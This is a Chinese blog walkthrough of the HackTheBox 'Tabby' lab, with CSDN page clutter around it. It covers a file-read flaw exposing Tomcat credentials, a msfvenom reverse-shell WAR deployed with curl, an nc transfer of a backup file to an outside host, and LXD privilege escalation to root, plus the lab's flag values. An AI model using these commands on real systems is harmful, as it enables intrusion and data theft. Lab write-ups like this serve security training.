hackthebox-Tracks-CREST_CRT-Tabby

最新推荐文章于 2023-02-21 21:58:27 发布
最新推荐文章于 2023-02-21 21:58:27 发布
阅读量98 收藏
点赞数
分类专栏: hackthebox 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lalalaze/article/details/129005549
版权

dirsearch 目录爆破

http://megahosting.htb/news.php?file=statement#callus

代码是文件读取漏洞

是tomcat9

文件读取 /etc/tomcat9/tomcat-users.xml

通过查询 tomcat-users.xml文件的路径为: /usr/share/tomcat9/etc/tomcat-users.xml

获得账号密码

username="tomcat"

password="$3cureP4s5w0rd123!"

访问 http://megahosting.htb:8080/host-manager/html

使用账号密码成功登录

https://tomcat.apache.org/tomcat-9.0-doc/manager-howto.html#Deploy_a_Directory_or_WAR_by_URL

MSF构造war木马

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.16.3 LPORT=9999 -f war > lalala.war

war包上传

curl --user 'tomcat:$3cureP4s5w0rd123!' --upload-file lalala.war "http://megahosting.htb:8080/manager/text/deploy?path=/lalala.war"

本机监听

访问 http://megahosting.htb:8080/lalala.war/ 触发

python升级shell

python3 -c 'import pty; pty.spawn("/bin/bash")'

nc -nvlp 4747 > 1.zip

nc 10.10.16.6 4747 < /var/www/html/files/16162020_backup.zip

ea57099fd4dcb9fc0dbef97cb22129c3

上传linpeas.sh

lxd提权

proxychains git clone  https://github.com/saghul/lxd-alpine-builder.git

cd lxd-alpine-builder

./build-alpine

上传 alpine-v3.17-x86_64-20230212_1650.tar.gz 文件

在靶机上执行:

lxc image import ./alpine-v3.17-x86_64-20230212_1650.tar.gz --alias nhpt

将 /snap/bin 添加环境变量

export PATH=/snap/bin:$PATH

source activate

先执行前两步导入到镜像,并初始化镜像到ignite容器

lxc image list

lxc init nhpt ignite -c security.privileged=true

第一次运行LXD需要执行lxd init进行初始化,然后再次初始化镜像nhpt到ignite容器

(注:一路回车就行)

lxc config device add ignite nhpt disk source=/ path=/mnt/root recursive=true

lxc start ignite

lxc exec ignite /bin/sh

获取root flag

(注:目录挂载在mnt目录下)

e6bbd13826e9e21ac57cee80724d6f4a

提权2:(参考链接:https://0xdf.gitlab.io/2020/11/07/htb-tabby.html

https://blog.csdn.net/weixin_45527786/article/details/112719931)

echo QlpoOTFBWSZTWaxzK54ABPR/p86QAEBoA//QAA3voP/v3+AACAAEgACQAIAIQAK8KAKCGURPUPJGRp6gNAAAAGgeoA5gE0wCZDAAEwTAAADmATTAJkMAATBMAAAEiIIEp5CepmQmSNNqeoafqZTxQ00HtU9EC9/dr7/586W+tl+zW5or5/vSkzToXUxptsDiZIE17U20gexCSAp1Z9b9+MnY7TS1KUmZjspN0MQ23dsPcIFWwEtQMbTa3JGLHE0olggWQgXSgTSQoSEHl4PZ7N0+FtnTigWSAWkA+WPkw40ggZVvYfaxI3IgBhip9pfFZV5Lm4lCBExydrO+DGwFGsZbYRdsmZxwDUTdlla0y27s5Euzp+Ec4hAt+2AQL58OHZEcPFHieKvHnfyU/EEC07m9ka56FyQh/LsrzVNsIkYLvayQzNAnigX0venhCMc9XRpFEVYJ0wRpKrjabiC9ZAiXaHObAY6oBiFdpBlggUJVMLNKLRQpDoGDIwfle01yQqWxwrKE5aMWOglhlUQQUit6VogV2cD01i0xysiYbzerOUWyrpCAvE41pCFYVoRPj/B28wSZUy/TaUHYx9GkfEYg9mcAilQ+nPCBfgZ5fl3GuPmfUOB3sbFm6/bRA0nXChku7aaN+AueYzqhKOKiBPjLlAAvxBAjAmSJWD5AqhLv/fWja66s7omu/ZTHcC24QJ83NrM67KACLACNUcnJjTTHCCDUIUJtOtN+7rQL+kCm4+U9Wj19YXFhxaXVt6Ph1ALRKOV9Xb7Sm68oF7nhyvegWjELKFH3XiWstVNGgTQTWoCjDnpXh9+/JXxIg4i8mvNobXGIXbmrGeOvXE8pou6wdqSD/F3JFOFCQrHMrng= | base64 -d > bob.tar.bz2

lxc image import bob.tar.bz2 --alias bobImage

lxc init bobImage bobVM -c security.privileged=true

lxc config device add bobVM realRoot disk source=/ path=r

lxc start bobVM

lxc exec bobVM -- /bin/sh

获取root flag

9a8564d1113a39803cf1f05ff39d93f5

参考

https://blog.csdn.net/qq_32261191/article/details/106884702

:)--+
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
『Java安全』tabby代码审计工具Windows环境搭建
Ho1aAs‘s Blog
03-27 4324
文章目录前言Windows环境搭建Neo4j环境tabby分析并保存数据Neo4j查询完 前言 wh1t3p1g/tabby tabby是wh1t3p1g师傅编写的针对Java语言的静态代码分析工具 Windows环境搭建 Neo4j环境 见wh1t3p1g师傅的环境配置教程 tabby/wiki/Neo4j环境配置 tabby分析并保存数据 RELEASE版本的jar包是wh1t3p1g师傅在mac环境编译的(目前最新v1.1.0-RELEASE),在windows使用可能会报错,需要重新编译或者
【Apollo7.0】感知模块(3):激光雷达感知中的目标跟踪算法--lidar_obstacle_tracking---multi_target_tracker
yangda_9527的博客
04-17 1639
apollo7.0, 激光雷达感知中的目标跟踪算法。
如何为目标识别追踪项目mikel-brostrom/yolov8_tracking增加计数功能?
专注“目标检测”领域技术分享
02-21 4414
代码的网址项目名:Real-time multi-object tracking and segmentation using Yolov8(1)它的识别和分割是YOLO8完成的。它的多目标追踪是由后面四种算法实现的(botsort,bytetrack,ocsort,strongsort)(2)它这个是实时的Real-time,识别、跟踪、分割的速度很快。
ROS Navigation-----costmap_2d简介
倔强不倒翁的博客
11-30 8611
costmap_2d简介
memory-profiler
既然选择了远方 便只顾风雨兼程 - 永强
08-26 2457
memory-profiler https://pypi.org/project/memory-profiler/ A module for monitoring memory usage of a python program. 用于监视 python 程序的内存使用情况的模块。 1. Memory Profiler This is a python module for monitoring ...
Human-Falling-Detect-Tracks:AlphaPose + ST-GCN + SORT
04-14
人体跌倒检测与追踪使用Tiny-YOLO oneclass检测帧中的每个人,并使用获取骨骼姿势,然后使用模型从每个人跟踪的每30帧中预测动作。 现在支持7种动作:站立,行走,坐着,躺下,站起来,坐下,跌倒。...
easyeda-round-tracks:EasyEDA的弯曲轨道和泪珠
05-04
easyeda-round-tracks 基于此扩展将舍入应用于EasyEDA中PCB上的铜走线。安装下载/克隆此存储库在浏览器或桌面中打开 在EasyEDA中,转到“高级”>“扩展名”>“扩展名设置...”>“加载扩展名...”>“选择文件...”。 ...
spotify-top-tracks
05-21
Spotify-Top-tracks 基于: : 适用于iOS 14的小部件,显示了过去四周内您收听次数最多的曲目。 安装 Spotify先决条件 1.)转到并创建一个新的应用程序2.)点击“编辑设置”,然后添加作为重定向URI。 3.)在编辑...
py-eddy-tracker-master_satphy_python_tracker_tracking_中尺度涡_
10-03
实现对中尺度涡的标注,完成中尺度涡分布的绘图
MSRX6-20151123214504525_MagStripe_DecodeMagStripe_Tracks_MSRX6_源
09-28
read write erase all 3 tracks for magstripe cards
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8331
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
简约大气毕业论文答辩PPT模板
07-11
【作品名称】:简约大气毕业论文答辩PPT模板 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。
创意灯泡毕业答辩PPT模板 (2)
07-11
【作品名称】:创意灯泡毕业答辩PPT模板 (2) 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。 【项目介绍】:创意灯泡毕业答辩PPT模板 (2)
总结汇报述职简介答辩培训美容课件PPT模板
07-11
【作品名称】:总结汇报述职简介答辩培训美容课件PPT模板 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。
NC57固定资产.pdf
最新发布
07-11
NC57固定资产
Oracle_ERP_项目实施方案(文档模版).doc
07-11
Oracle_ERP_项目实施方案(文档模版)
卡侬连接器,前14大企业占据全球53%的市场份额调研数据(2023).pdf
07-11
QYResearch是全球知名的大型咨询公司,行业涵盖各高科技行业产业链细分市场,横跨如半导体产业链(半导体设备及零部件、半导体材料、集成电路、制造、封测、分立器件、传感器、光电器件)、光伏产业链(设备、硅料/硅片、电池片、组件、辅料支架、逆变器、电站终端)、新能源汽车产业链(动力电池及材料、电驱电控、汽车半导体/电子、整车、充电桩)、通信产业链(通信系统设备、终端设备、电子元器件、射频前端、光模块、4G/5G/6G、宽带、IoT、数字经济、AI)、先进材料产业链(金属材料、高分子材料、陶瓷材料、纳米材料等)、机械制造产业链(数控机床、工程机械、电气机械、3C自动化、工业机器人、激光、工控、无人机)、食品药品、医疗器械、农业等。 邮箱:market@qyresearch.com
CAITA二次发+基础与环境配置教程
07-11
CAITA二次发+基础与环境配置教程
SAP-BOSAP-BO
07-11
SAP-BOSAP-BO
通过echarts根据hangzhou-tracks.json绘制地图
05-14
然后,需要准备好数据文件hangzhou-tracks.json,该文件包含杭州市的地理信息。最后,可以根据数据文件使用echarts绘制地图。 以下是一个简单的例子: ```html <!DOCTYPE html> <meta charset="utf-8"> ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值